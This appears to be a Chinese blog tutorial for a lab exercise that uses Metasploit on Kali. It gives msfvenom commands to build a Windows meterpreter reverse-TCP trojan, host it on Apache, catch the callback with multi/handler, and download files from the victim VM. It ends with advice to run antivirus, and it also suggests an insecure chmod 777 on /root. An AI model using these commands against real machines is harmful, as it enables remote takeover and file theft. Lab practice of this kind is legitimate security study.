Kali2虚拟机中工具Metasploit的简单应用

实验环境

攻击机:Kali-Linux-2021.2-vmware-amd64

靶机:Win2003 旗舰版

实验过程

一、利用metasploit生成被控端

打开kali窗口,输入命令(注意空格符,复现过程惨痛代价)

sudo msfvenom -p windows/meterpreter/reverse_tcp lhost=攻击机的ip地址 lport=5000 -f exe  -o  /root/payload.exe

这样就是生成成功了

 远程控制程序payload.exe(被控端)生成在我攻击机上的root文件夹里(root目录下文件会隐藏,ctrl+h就能显现出来了)

ps:如果进入/root/这个文件目录提示文件权限不足时,可以使用chmod 777 /root 命令来解锁权限

将木马文件payload.exe 拷贝到/var/www/html, 开启apache服务

  • cp /root/payload.exe /var/www/html/

  • service apache2 start

 

 

打开靶机,用浏览器访问以下url地址下载木马并安装

攻击机ip/ payload.exe 

二、 启动攻击

kali窗口输入命令打开msf工具,并依次输入以下命令,配置连接

命令:msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 攻击机ip
set lport 5000
exploit

靶机运行网站下载的payload.exe文件后,回到攻击机,我们发现,Metasploit打开了一个session(会话),这表示从现在开始我们可以通过被控端程序控制目标计算机了

 输入ls命令查看目标计算机当前目录下的文件

我们在靶机该目录下使用下面的命令,就可以从目标靶机的当前目录下载文件到攻击机上了

download 文件名

文件下载一般是放到攻击机存放.exe木马的目录下(ps:root目录下文件会隐藏,ctrl+h就能显现出来了)

小结

这种木马.exe能利用是因为靶机上没有安装相关安全检测软件(例如火绒安全),所以我们的物理机上还是安装一个,安装未知来源的app是先扫描一下,还有电脑要常杀毒,保护我们的安全,very good!

 

 

 

 

 

  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值